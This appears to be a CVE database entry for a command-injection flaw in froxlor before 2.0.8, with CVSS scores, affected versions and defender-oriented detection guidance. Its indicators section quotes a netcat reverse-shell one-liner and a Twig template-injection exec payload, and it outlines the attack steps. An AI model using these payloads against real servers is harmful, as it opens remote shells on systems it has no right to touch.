cbcvebase.
CVE-2023-0315
published 2023-01-16

CVE-2023-0315: Command Injection in GitHub repository froxlor/froxlor prior to 2.0.8.

PriorityP278high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
97.65%
99.9th percentile
Command Injection in GitHub repository froxlor/froxlor prior to 2.0.8.

Affected

3 ranges
VendorProductVersion rangeFixed in
froxlorfroxlor< 2.0.82.0.8
froxlorfroxlor>= 0 < 2.0.82.0.8
froxlorfroxlor_froxlor>= unspecified < 2.0.82.0.8

Detection & IOCsextracted from sources · hover to see the quote

path/tmp/f
commandrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f
command{{['<cmd>']|filter('exec')}}
url/admin_settings.php?page=overview&part=logging
url/admin_index.php
  • Detect POST requests to /admin_settings.php?page=overview&part=logging that set the logger_logfile parameter to a path ending in .twig — this is the log-path manipulation step of the exploit.
  • Detect POST requests to /admin_index.php with a body containing the Twig SSTI filter-exec pattern: {{[' ... ']|filter('exec')}} — this is the template injection payload delivery step.
  • Detect POST requests to /admin_index.php with page=change_theme and a 'theme' parameter containing Twig expression syntax ({{ and }}) — indicates SSTI payload injection via the theme-change endpoint.
  • Monitor for mkfifo and netcat (nc) execution under the www-data process tree — these are spawned by the reverse shell one-liner written into the poisoned Twig template.
  • ·The exploit requires valid admin credentials — it is an authenticated RCE. Detection rules should focus on the post-login log-path change and template injection steps rather than the login itself.
  • ·The exploit targets Froxlor v2.0.7 and below; the vulnerability is patched in v2.0.8. Ensure version detection is part of asset inventory checks.
  • ·The reverse shell executes under the www-data user; privilege escalation is not part of this CVE's scope. Post-exploitation activity will appear as www-data spawning shells.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv3.07.2HIGHCVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.